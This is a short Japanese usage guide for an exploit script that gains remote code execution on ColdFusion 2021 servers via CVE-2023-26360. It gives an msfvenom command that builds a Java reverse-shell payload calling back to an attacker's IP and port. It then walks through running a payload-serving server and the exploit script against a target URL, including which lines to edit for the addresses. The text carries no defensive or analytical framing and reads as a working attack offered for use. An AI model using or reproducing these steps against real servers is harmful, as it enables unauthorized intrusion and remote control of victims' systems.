
ColdFusion 2021 (CVE-2023-26360) におけるリモートコード実行のエクスプロイト
スクリプトは最初の試行で動作しないことがあります。数回試して動作させてください。
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java
server.py の起動cve.2023-26360.py による初期アクセス後に ColdFusion サーバーにペイロードを送信するため、最初に起動しておく必要があります。python3 server.py 8000
引数 8000 はサーバーが待ち受けるポートです。
12行目でサーバーのIPアドレスを設定していることに注意してください。そのため、変更してください:
s.bind(('192.168.56.1',port))
cve-2023-26360.py の実行python3 cve-2023-26360.py 8000
server.py と同様に、引数 8000 は server.py が待ち受けるポートです。そのため、両方のコマンドで同じにする必要があります。
cve-2023-26360.py の8行目で server.py が待ち受けるIPアドレスを設定します。正しく設定する必要があります。
cve-2023-26360.py の11行目で ColdFusion サーバーのIPアドレスを設定します。そのため、変更してください:
url = "http://192.168.56.102:8500"